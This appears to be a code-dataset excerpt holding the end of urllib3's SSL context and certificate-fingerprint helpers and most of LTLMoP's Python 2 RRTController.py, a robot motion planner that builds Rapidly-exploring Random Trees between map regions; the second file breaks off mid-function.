if self.supports_set_ciphers: # Platform-specific: Python 2.7+
return wrap_socket(socket, ciphers=self.ciphers, **kwargs)
else: # Platform-specific: Python 2.6
return wrap_socket(socket, **kwargs)
def assert_fingerprint(cert, fingerprint):
"""
Checks if given fingerprint matches the supplied certificate.
:param cert:
Certificate as bytes object.
:param fingerprint:
Fingerprint as string of hexdigits, can be interspersed by colons.
"""
# Maps the length of a digest to a possible hash function producing
# this digest.
hashfunc_map = {
16: md5,
20: sha1,
32: sha256,
}
fingerprint = fingerprint.replace(':', '').lower()
digest_length, odd = divmod(len(fingerprint), 2)
if odd or digest_length not in hashfunc_map:
raise SSLError('Fingerprint is of invalid length.')
# We need encode() here for py32; works on py2 and p33.
fingerprint_bytes = unhexlify(fingerprint.encode())
hashfunc = hashfunc_map[digest_length]
cert_digest = hashfunc(cert).digest()
if not cert_digest == fingerprint_bytes:
raise SSLError('Fingerprints did not match. Expected "{0}", got "{1}".'
.format(hexlify(fingerprint_bytes),
hexlify(cert_digest)))
def resolve_cert_reqs(candidate):
"""
Resolves the argument to a numeric constant, which can be passed to
the wrap_socket function/method from the ssl module.
Defaults to :data:`ssl.CERT_NONE`.
If given a string it is assumed to be the name of the constant in the
:mod:`ssl` module or its abbrevation.
(So you can specify `REQUIRED` instead of `CERT_REQUIRED`.
If it's neither `None` nor a string we assume it is already the numeric
constant which can directly be passed to wrap_socket.
"""
if candidate is None:
return CERT_NONE
if isinstance(candidate, str):
res = getattr(ssl, candidate, None)
if res is None:
res = getattr(ssl, 'CERT_' + candidate)
return res
return candidate
def resolve_ssl_version(candidate):
"""
like resolve_cert_reqs
"""
if candidate is None:
return PROTOCOL_SSLv23
if isinstance(candidate, str):
res = getattr(ssl, candidate, None)
if res is None:
res = getattr(ssl, 'PROTOCOL_' + candidate)
return res
return candidate
def create_urllib3_context(ssl_version=None, cert_reqs=None,
options=None, ciphers=None):
"""All arguments have the same meaning as ``ssl_wrap_socket``.
By default, this function does a lot of the same work that
``ssl.create_default_context`` does on Python 3.4+. It:
- Disables SSLv2, SSLv3, and compression
- Sets a restricted set of server ciphers
If you wish to enable SSLv3, you can do::
from urllib3.util import ssl_
context = ssl_.create_urllib3_context()
context.options &= ~ssl_.OP_NO_SSLv3
You can do the same to enable compression (substituting ``COMPRESSION``
for ``SSLv3`` in the last line above).
:param ssl_version:
The desired protocol version to use. This will default to
PROTOCOL_SSLv23 which will negotiate the highest protocol that both
the server and your installation of OpenSSL support.
:param cert_reqs:
Whether to require the certificate verification. This defaults to
``ssl.CERT_REQUIRED``.
:param options:
Specific OpenSSL options. These default to ``ssl.OP_NO_SSLv2``,
``ssl.OP_NO_SSLv3``, ``ssl.OP_NO_COMPRESSION``.
:param ciphers:
Which cipher suites to allow the server to select.
:returns:
Constructed SSLContext object with specified options
:rtype: SSLContext
"""
context = SSLContext(ssl_version or ssl.PROTOCOL_SSLv23)
# Setting the default here, as we may have no ssl module on import
cert_reqs = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs
if options is None:
options = 0
# SSLv2 is easily broken and is considered harmful and dangerous
options |= OP_NO_SSLv2
# SSLv3 has several problems and is now dangerous
options |= OP_NO_SSLv3
# Disable compression to prevent CRIME attacks for OpenSSL 1.0+
# (issue #309)
options |= OP_NO_COMPRESSION
context.options |= options
if getattr(context, 'supports_set_ciphers', True): # Platform-specific: Python 2.6
context.set_ciphers(ciphers or DEFAULT_CIPHERS)
context.verify_mode = cert_reqs
if getattr(context, 'check_hostname', None) is not None: # Platform-specific: Python 3.2
# We do our own verification, including fingerprints and alternative
# hostnames. So disable it here
context.check_hostname = False
return context
def ssl_wrap_socket(sock, keyfile=None, certfile=None, cert_reqs=None,
ca_certs=None, server_hostname=None,
ssl_version=None, ciphers=None, ssl_context=None):
"""
All arguments except for server_hostname and ssl_context have the same
meaning as they do when using :func:`ssl.wrap_socket`.
:param server_hostname:
When SNI is supported, the expected hostname of the certificate
:param ssl_context:
A pre-made :class:`SSLContext` object. If none is provided, one will
be created using :func:`create_urllib3_context`.
:param ciphers:
A string of ciphers we wish the client to support. This is not
supported on Python 2.6 as the ssl module does not support it.
"""
context = ssl_context
if context is None:
context = create_urllib3_context(ssl_version, cert_reqs,
ciphers=ciphers)
if ca_certs:
try:
context.load_verify_locations(ca_certs)
except IOError as e: # Platform-specific: Python 2.6, 2.7, 3.2
raise SSLError(e)
# Py33 raises FileNotFoundError which subclasses OSError
# These are not equivalent unless we check the errno attribute
except OSError as e: # Platform-specific: Python 3.3 and beyond
if e.errno == errno.ENOENT:
raise SSLError(e)
raise
if certfile:
context.load_cert_chain(certfile, keyfile)
if HAS_SNI: # Platform-specific: OpenSSL with enabled SNI
return context.wrap_socket(sock, server_hostname=server_hostname)
return context.wrap_socket(sock)
|
gpl-2.0
|
jadecastro/LTLMoP
|
src/lib/handlers/motionControl/RRTController.py
|
1
|
37133
|
#!/usr/bin/env python
"""
===================================================================
RRTController.py - Rapidly-Exploring Random Trees Motion Controller
===================================================================
Uses Rapidly-exploring Random Tree Algorithm to generate paths given the starting position and the goal point.
"""
from numpy import *
from __is_inside import *
import math
import sys,os
from scipy.linalg import norm
from numpy.matlib import zeros
import __is_inside
import time, sys,os
import scipy as Sci
import scipy.linalg
import Polygon, Polygon.IO
import Polygon.Utils as PolyUtils
import Polygon.Shapes as PolyShapes
from math import sqrt, fabs , pi
import random
import thread
import threading
# importing matplotlib to show the path if possible
try:
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import_matplotlib = True
except:
print "matplotlib is not imported. Plotting is disabled"
import_matplotlib = False
class motionControlHandler:
def __init__(self, proj, shared_data,robot_type,max_angle_goal,max_angle_overlap,plotting):
"""
Rapidly-Exploring Random Trees alogorithm motion planning controller
robot_type (int): Which robot is used for execution. BasicSim is 1, ODE is 2, ROS is 3, Nao is 4, Pioneer is 5(default=1)
max_angle_goal (float): The biggest difference in angle between the new node and the goal point that is acceptable. If it is bigger than the max_angle, the new node will not be connected to the goal point. The value should be within 0 to 6.28 = 2*pi. Default set to 6.28 = 2*pi (default=6.28)
max_angle_overlap (float): difference in angle allowed for two nodes overlapping each other. If you don't want any node overlapping with each other, put in 2*pi = 6.28. Default set to 1.57 = pi/2 (default=1.57)
plotting (bool): Check the box to enable plotting. Uncheck to disable plotting (default=True)
"""
self.system_print = False # for debugging. print on GUI ( a bunch of stuffs)
self.finish_print = False # set to 1 to print the original finished E and V before trimming the tree
self.orientation_print = False # show the orientation information of the robot
# Get references to handlers we'll need to communicate with
self.drive_handler = proj.h_instance['drive']
self.pose_handler = proj.h_instance['pose']
# Get information about regions
self.proj = proj
self.coordmap_map2lab = proj.coordmap_map2lab
self.coordmap_lab2map = proj.coordmap_lab2map
self.last_warning = 0
self.previous_next_reg = None
# Store the Rapidly-Exploring Random Tress Built
self.RRT_V = None # array containing all the points on the RRT Tree
self.RRT_E = None # array specifying the connection of points on the Tree
self.E_current_column = None # the current column on the tree (to find the current heading point)
self.Velocity = None
self.currentRegionPoly = None
self.nextRegionPoly = None
self.map = {}
self.all = Polygon.Polygon()
self.trans_matrix = mat([[0,1],[-1,0]]) # transformation matrix for find the normal to the vector
self.stuck_thres = 20 # threshold for changing the range of sampling omega
# Information about the robot (default set to ODE)
if robot_type not in [1,2,3,4,5]:
robot_type = 1
self.system = robot_type
# Information about maximum turning angle allowed from the latest node to the goal point
if max_angle_goal > 2*pi:
max_angle_goal = 2*pi
if max_angle_goal < 0:
max_angle_goal = 0
self.max_angle_allowed = max_angle_goal
# Information about maximum difference in angle allowed between two overlapping nodes
if max_angle_overlap > 2*pi:
max_angle_overlap = 2*pi
if max_angle_overlap < 0:
max_angle_overlap = 0
self.max_angle_overlap = max_angle_overlap
# Information about whether plotting is enabled.
if plotting is True and import_matplotlib == True:
self.plotting = True
else:
self.plotting = False
# Specify the size of the robot
# 1: basicSim; 2: ODE; 3: ROS 4: Nao; 5: Pioneer
# self.radius: radius of the robot
# self.timestep : number of linear segments to break the curve into for calculation of x, y position
# self.step_size : the length of each step for connection to goal point
# self.velocity : Velocity of the robot in m/s in control space (m/s)
if self.system == 1:
self.radius = 5
self.step_size = 25
self.timeStep = 10
self.velocity = 2 # 1.5
if self.system == 2:
self.radius = 5
self.step_size = 15
self.timeStep = 10
self.velocity = 2 # 1.5
elif self.system == 3:
self.ROSInitHandler = shared_data['ROS_INIT_HANDLER']
self.radius = self.ROSInitHandler.robotPhysicalWidth/2
self.step_size = self.radius*3 #0.2
self.timeStep = 8
self.velocity = self.radius/2 #0.08
elif self.system == 4:
self.radius = 0.15*1.2
self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
elif self.system == 5:
self.radius = 0.15
self.step_size = 0.2 #set the step_size for points be 1/5 of the norm ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
# Operate_system (int): Which operating system is used for execution.
# Ubuntu and Mac is 1, Windows is 2
if sys.platform in ['win32', 'cygwin']:
self.operate_system = 2
else:
self.operate_system = 1
if self.system_print == True:
print "The operate_system is "+ str(self.operate_system)
# Generate polygon for regions in the map
for region in self.proj.rfi.regions:
self.map[region.name] = self.createRegionPolygon(region)
for n in range(len(region.holeList)): # no of holes
self.map[region.name] -= self.createRegionPolygon(region,n)
# Generate the boundary polygon
for regionName,regionPoly in self.map.iteritems():
self.all += regionPoly
# Start plotting if operating in Windows
if self.operate_system == 2 and self.plotting ==True:
# start using anmination to plot the robot
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111)
self.scope = _Scope(self.ax,self)
thread.start_new_thread(self.jplot,())
def gotoRegion(self, current_reg, next_reg, last=False):
"""
If ``last`` is True, we will move to the center of the destination region.
Returns ``True`` if we've reached the destination region.
"""
if current_reg == next_reg and not last:
# No need to move!
self.drive_handler.setVelocity(0, 0) # So let's stop
return True
# Find our current configuration
pose = self.pose_handler.getPose()
# Check if Vicon has cut out
# TODO: this should probably go in posehandler?
if math.isnan(pose[2]):
print "WARNING: No Vicon data! Pausing."
self.drive_handler.setVelocity(0, 0) # So let's stop
time.sleep(1)
return False
###This part will be run when the robot goes to a new region, otherwise, the original tree will be used.
if not self.previous_next_reg == next_reg:
# Entered a new region. New tree should be formed.
self.nextRegionPoly = self.map[self.proj.rfi.regions[next_reg].name]
self.currentRegionPoly = self.map[self.proj.rfi.regions[current_reg].name]
if self.system_print == True:
print "next Region is " + str(self.proj.rfi.regions[next_reg].name)
print "Current Region is " + str(self.proj.rfi.regions[current_reg].name)
#set to zero velocity before tree is generated
self.drive_handler.setVelocity(0, 0)
if last:
transFace = None
else:
# Determine the mid points on the faces connecting to the next region (one goal point will be picked among all the mid points later in buildTree)
transFace = None
q_gBundle = [[],[]] # list of goal points (midpoints of transition faces)
face_normal = [[],[]] # normal of the trnasition faces
for i in range(len(self.proj.rfi.transitions[current_reg][next_reg])):
pointArray_transface = [x for x in self.proj.rfi.transitions[current_reg][next_reg][i]]
transFace = asarray(map(self.coordmap_map2lab,pointArray_transface))
bundle_x = (transFace[0,0] +transFace[1,0])/2 #mid-point coordinate x
bundle_y = (transFace[0,1] +transFace[1,1])/2 #mid-point coordinate y
q_gBundle = hstack((q_gBundle,vstack((bundle_x,bundle_y))))
#find the normal vector to the face
face = transFace[0,:] - transFace[1,:]
distance_face = norm(face)
normal = face/distance_face * self.trans_matrix
face_normal = hstack((face_normal,vstack((normal[0,0],normal[0,1]))))
if transFace is None:
print "ERROR: Unable to find transition face between regions %s and %s. Please check the decomposition (try viewing projectname_decomposed.regions in RegionEditor or a text editor)." % (self.proj.rfi.regions[current_reg].name, self.proj.rfi.regions[next_reg].name)
# Run algorithm to build the Rapid-Exploring Random Trees
self.RRT_V = None
self.RRT_E = None
# For plotting
if self.operate_system == 2:
if self.plotting == True:
self.ax.cla()
else:
self.ax = None
else:
self.ax = None
if self.operate_system == 1 and self.plotting == True:
plt.cla()
self.plotMap(self.map)
plt.plot(pose[0],pose[1],'ko')
self.RRT_V,self.RRT_E,self.E_current_column = self.buildTree(\
[pose[0], pose[1]],pose[2],self.currentRegionPoly, self.nextRegionPoly,q_gBundle,face_normal)
"""
# map the lab coordinates back to pixels
V_tosend = array(mat(self.RRT_V[1:,:])).T
V_tosend = map(self.coordmap_lab2map, V_tosend)
V_tosend = mat(V_tosend).T
s = 'RRT:E'+"["+str(list(self.RRT_E[0]))+","+str(list(self.RRT_E[1]))+"]"+':V'+"["+str(list(self.RRT_V[0]))+","+str(list(V_tosend[0]))+","+str(list(V_tosend[1]))+"]"+':T'+"["+str(list(q_gBundle[0]))+","+str(list(q_gBundle[1]))+"]"
#print s
"""
# Run algorithm to find a velocity vector (global frame) to take the robot to the next region
self.Velocity = self.getVelocity([pose[0], pose[1]], self.RRT_V,self.RRT_E)
#self.Node = self.getNode([pose[0], pose[1]], self.RRT_V,self.RRT_E)
self.previous_next_reg = next_reg
# Pass this desired velocity on to the drive handler
self.drive_handler.setVelocity(self.Velocity[0,0], self.Velocity[1,0], pose[2])
#self.drive_handler.setVelocity(self.Node[0,0], self.Node[1,0], pose[2])
RobotPoly = Polygon.Shapes.Circle(self.radius,(pose[0],pose[1]))
# check if robot is inside the current region
departed = not self.currentRegionPoly.overlaps(RobotPoly)
arrived = self.nextRegionPoly.covers(RobotPoly)
if departed and (not arrived) and (time.time()-self.last_warning) > 0.5:
# Figure out what region we think we stumbled into
for r in self.proj.rfi.regions:
pointArray = [self.coordmap_map2lab(x) for x in r.getPoints()]
vertices = mat(pointArray).T
if is_inside([pose[0], pose[1]], vertices):
print "I think I'm in " + r.name
print pose
break
self.last_warning = time.time()
#print "arrived:"+str(arrived)
return arrived
def createRegionPolygon(self,region,hole = None):
"""
This function takes in the region points and make it a Polygon.
"""
if hole == None:
pointArray = [x for x in region.getPoints()]
else:
pointArray = [x for x in region.getPoints(hole_id = hole)]
pointArray = map(self.coordmap_map2lab, pointArray)
regionPoints = [(pt[0],pt[1]) for pt in pointArray]
formedPolygon= Polygon.Polygon(regionPoints)
return formedPolygon
def getVelocity(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
#else:
# dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- vstack((V[1,E[0,self.E_current_column]],V[2,E[0,self.E_current_column]]))
Vel = zeros([2,1])
Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Vel
def getNode(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
Node = zeros([2,1])
Node[0,0] = V[1,E[1,self.E_current_column]]
Node[1,0] = V[2,E[1,self.E_current_column]]
#Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Node
def buildTree(self,p,theta,regionPoly,nextRegionPoly,q_gBundle,face_normal, last=False):
"""
This function builds the RRT tree.
p : x,y position of the robot
theta : current orientation of the robot
regionPoly : current region polygon
nextRegionPoly : next region polygon
q_gBundle : coordinates of q_goals that the robot can reach
face_normal : the normal vector of each face corresponding to each goal point in q_gBundle
"""
q_init = mat(p).T
V = vstack((0,q_init))
theta = self.orientation_bound(theta)
V_theta = array([theta])
#!!! CONTROL SPACE: generate a list of omega for random sampling
omegaLowerBound = -math.pi/20 # upper bound for the value of omega
omegaUpperBound = math.pi/20 # lower bound for the value of omega
omegaNoOfSteps = 20
self.omega_range = linspace(omegaLowerBound,omegaUpperBound,omegaNoOfSteps)
self.omega_range_escape = linspace(omegaLowerBound*4,omegaUpperBound*4,omegaNoOfSteps*4) # range used when stuck > stuck_thres
regionPolyOld = Polygon.Polygon(regionPoly)
regionPoly += PolyShapes.Circle(self.radius*2.5,(q_init[0,0],q_init[1,0]))
# check faces of the current region for goal points
E = [[],[]] # the tree matrix
Other = [[],[]]
path = False # if path formed then = 1
stuck = 0 # count for changing the range of sampling omega
append_after_latest_node = False # append new nodes to the latest node
if self.system_print == True:
print "plotting in buildTree is " + str(self.plotting)
if self.plotting == True:
if not plt.isinteractive():
plt.ion()
plt.hold(True)
while not path:
#step -1: try connection to q_goal (generate path to goal)
i = 0
if self.system_print == True:
print "Try Connection to the goal points"
# pushing possible q_goals into the current region (ensure path is covered by the current region polygon)
q_pass = [[],[],[]]
q_pass_dist = []
q_gBundle = mat(q_gBundle)
face_normal = mat(face_normal)
while i < q_gBundle.shape[1]:
q_g_original = q_gBundle[:,i]
q_g = q_gBundle[:,i]+face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#q_g = q_gBundle[:,i]+(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
if not regionPolyOld.isInside(q_g[0],q_g[1]):
#q_g = q_gBundle[:,i]-(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
q_g = q_gBundle[:,i]-face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#forming polygon for path checking
EdgePolyGoal = PolyShapes.Circle(self.radius,(q_g[0,0],q_g[1,0])) + PolyShapes.Circle(self.radius,(V[1,shape(V)[1]-1],V[2:,shape(V)[1]-1]))
EdgePolyGoal = PolyUtils.convexHull(EdgePolyGoal)
dist = norm(q_g - V[1:,shape(V)[1]-1])
#check connection to goal
connect_goal = regionPoly.covers(EdgePolyGoal) #check coverage of path from new point to goal
# compare orientation difference
thetaPrev = V_theta[shape(V)[1]-1]
theta_orientation = abs(arctan((q_g[1,0]- V[2,shape(V)[1]-1])/(q_g[0,0]- V[1,shape(V)[1]-1])))
if q_g[1,0] > V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: # second quadrant
theta_orientation = pi - theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # first quadrant
theta_orientation = theta_orientation
elif q_g[1,0] < V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: #third quadrant
theta_orientation = pi + theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # foruth quadrant
theta_orientation = 2*pi - theta_orientation
# check the angle between vector(new goal to goal_original ) and vector( latest node to new goal)
Goal_to_GoalOriginal = q_g_original - q_g
LatestNode_to_Goal = q_g - V[1:,shape(V)[1]-1]
Angle_Goal_LatestNode= arccos(vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))/norm(Goal_to_GoalOriginal)/norm(LatestNode_to_Goal))
# if connection to goal can be established and the max change in orientation of the robot is smaller than max_angle, tree is said to be completed.
if self.orientation_print == True:
print "theta_orientation is " + str(theta_orientation)
print "thetaPrev is " + str(thetaPrev)
print "(theta_orientation - thetaPrev) is " + str(abs(theta_orientation - thetaPrev))
print "self.max_angle_allowed is " + str(self.max_angle_allowed)
print "abs(theta_orientation - thetaPrev) < self.max_angle_allowed" + str(abs(theta_orientation - thetaPrev) < self.max_angle_allowed)
print"Goal_to_GoalOriginal: " + str( array(Goal_to_GoalOriginal)) + "; LatestNode_to_Goal: " + str( array(LatestNode_to_Goal))
print vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))
print "Angle_Goal_LatestNode" + str(Angle_Goal_LatestNode)
if connect_goal and (abs(theta_orientation - thetaPrev) < self.max_angle_allowed) and (Angle_Goal_LatestNode < self.max_angle_allowed):
path = True
q_pass = hstack((q_pass,vstack((i,q_g))))
q_pass_dist = hstack((q_pass_dist,dist))
i = i + 1
if self.system_print == True:
print "checked goal points"
self.E = E
self.V = V
# connection to goal has established
# Obtain the closest goal point that path can be formed.
if path:
if shape(q_pass_dist)[0] == 1:
cols = 0
else:
(cols,) = nonzero(q_pass_dist == min(q_pass_dist))
cols = asarray(cols)[0]
q_g = q_pass[1:,cols]
"""
q_g = q_g-(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*3*self.radius #org 3
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g+(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*6*self.radius #org 3
"""
if self.plotting == True :
if self.operate_system == 1:
plt.suptitle('Rapidly-exploring Random Tree', fontsize=12)
plt.xlabel('x')
plt.ylabel('y')
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
if shape(V)[1] <= 2:
self.ax.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
self.ax.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
# trim the path connecting current node to goal point into pieces if the path is too long now
numOfPoint = floor(norm(V[1:,shape(V)[1]-1]- q_g)/self.step_size)
if numOfPoint < 3:
numOfPoint = 3
x = linspace( V[1,shape(V)[1]-1], q_g[0,0], numOfPoint )
y = linspace( V[2,shape(V)[1]-1], q_g[1,0], numOfPoint )
for i in range(x.shape[0]):
if i != 0:
V = hstack((V,vstack((shape(V)[1],x[i],y[i]))))
E = hstack((E,vstack((shape(V)[1]-2,shape(V)[1]-1))))
#push the goal point to the next region
q_g = q_g+face_normal[:,q_pass[0,cols]]*3*self.radius ##original 2*self.radius
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g-face_normal[:,q_pass[0,cols]]*6*self.radius ##original 2*self.radius
V = hstack((V,vstack((shape(V)[1],q_g[0,0],q_g[1,0]))))
E = hstack((E,vstack((shape(V)[1]-2 ,shape(V)[1]-1))))
if self.plotting == True :
if self.operate_system == 1:
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
plt.figure(1).canvas.draw()
else:
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
self.ax.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
# path is not formed, try to append points onto the tree
if not path:
# connection_to_tree : connection to the tree is successful
if append_after_latest_node:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode(V,V_theta,E,Other,regionPoly,stuck, append_after_latest_node)
else:
connection_to_tree = False
while not connection_to_tree:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode (V,V_theta,E,Other,regionPoly,stuck)
if self.finish_print:
print 'Here is the V matrix:', V, 'Here is the E matrix:',E
print >>sys.__stdout__, 'Here is the V matrix:\n', V, '\nHere is the E matrix:\n',E
#B: trim to a single path
single = 0
while single == 0:
trim = 0
for j in range(shape(V)[1]-3):
(row,col) = nonzero(E == j+1)
if len(col) == 1:
E = delete(E, col[0], 1)
trim = 1
if trim == 0:
single = 1;
####print with matlib
if self.plotting ==True :
if self.operate_system == 1:
plt.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
plt.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
plt.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
self.ax.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
self.ax.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
self.ax.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
#return V, E, and the current node number on the tree
V = array(V)
return V, E, 0
def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False):
"""
Generate a new node on the current tree matrix
V : the node matrix
V_theta : the orientation matrix
E : the tree matrix (or edge matrix)
Other : the matrix containing the velocity and angular velocity(omega) information
regionPoly: the polygon of current region
stuck : count on the number of times failed to generate new node
append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful)
"""
if self.system_print == True:
print "In control space generating path,stuck = " + str(stuck)
connection_to_tree = False # True when connection to the tree is successful
if stuck > self.stuck_thres:
# increase the range of omega since path cannot ge generated
omega = random.choice(self.omega_range_escape)
else:
#!!!! CONTROL SPACE STEP 1 - generate random omega
omega = random.choice(self.omega_range)
#!!!! CONTROL SPACE STEP 2 - pick a random point on the tree
if append_after_latest_node:
tree_index = shape(V)[1]-1
else:
if random.choice([1,2]) == 1:
tree_index = random.choice(array(V[0])[0])
else:
tree_index = shape(V)[1]-1
xPrev = V[1,tree_index]
yPrev = V[2,tree_index]
thetaPrev = V_theta[tree_index]
j = 1
#!!!! CONTROL SPACE STEP 3 - Check path of the robot
path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev))
while j <= self.timeStep:
xOrg = xPrev
yOrg = yPrev
xPrev = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev))
yPrev = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev))
thetaPrev = omega* 1 + thetaPrev
path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev))
j = j + 1
thetaPrev = self.orientation_bound(thetaPrev)
path_all = PolyUtils.convexHull(path_robot)
in_bound = regionPoly.covers(path_all)
"""
# plotting
if plotting == True:
self.plotPoly(path_all,'r',1)
"""
stuck = stuck + 1
if in_bound:
robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev))
# check how many nodes on the tree does the new node overlaps with
nodes_overlap_count = 0
for k in range(shape(V)[1]-1):
robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k]))
if robot_new_node.overlaps(robot_old_node):
if abs(thetaPrev - V_theta[k]) < self.max_angle_overlap:
nodes_overlap_count += 1
if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500):
if stuck > self.stuck_thres+1:
append_after_latest_node = False
if (stuck > self.stuck_thres+500):
stuck = 0
stuck = stuck - 20
# plotting
if self.plotting == True:
self.plotPoly(path_all,'b',1)
if self.system_print == True:
print "node connected"
V = hstack((V,vstack((shape(V)[1],xPrev,yPrev))))
V_theta = hstack((V_theta,thetaPrev))
E = hstack((E,vstack((tree_index ,shape(V)[1]-1))))
Other = hstack((Other,vstack((self.velocity,omega))))
##################### E should add omega and velocity
connection_to_tree = True
append_after_latest_node = True
else:
append_after_latest_node = False
if self.system_print == True:
print "node not connected. check goal point"
else:
append_after_latest_node = False
return V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree
def orientation_bound(self,theta):
"""
make sure the returned angle is between 0 to 2*pi
"""
while theta > 2*pi or theta < 0:
if theta > 2*pi:
theta = theta - 2*pi
else:
theta = theta + 2*pi
return theta
def plotMap(self,mappedRegions):
"""
Plotting regions and obstacles with matplotlib.pyplot
number: figure number (see on top)
"""
#if not plt.isinteractive():
# plt.ion()
#plt.hold(True)
if self.operate_system == 1:
for regionName,regionPoly in mappedRegions.iteritems():
self.plotPoly(regionPoly,'k')
plt.figure(1).canvas.draw()
def plotPoly(self,c,string,w = 1):
"""
Plot polygons inside the boundary
c = polygon to be plotted with matlabplot
string = string that specify color
w = width of the line plotting
"""
if bool(c):
for i in range(len(c)):
#toPlot = Polygon.Polygon(c.contour(i))
toPlot = Polygon.Polygon(c.contour(i)) & self.all
if bool(toPlot):
for j in range(len(toPlot)):
#BoundPolyPoints = asarray(PolyUtils.pointList(toPlot.contour(j)))
BoundPolyPoints = asarray(PolyUtils.pointList(Polygon.Polygon(toPlot.contour(j))))
if self.operate_system == 2:
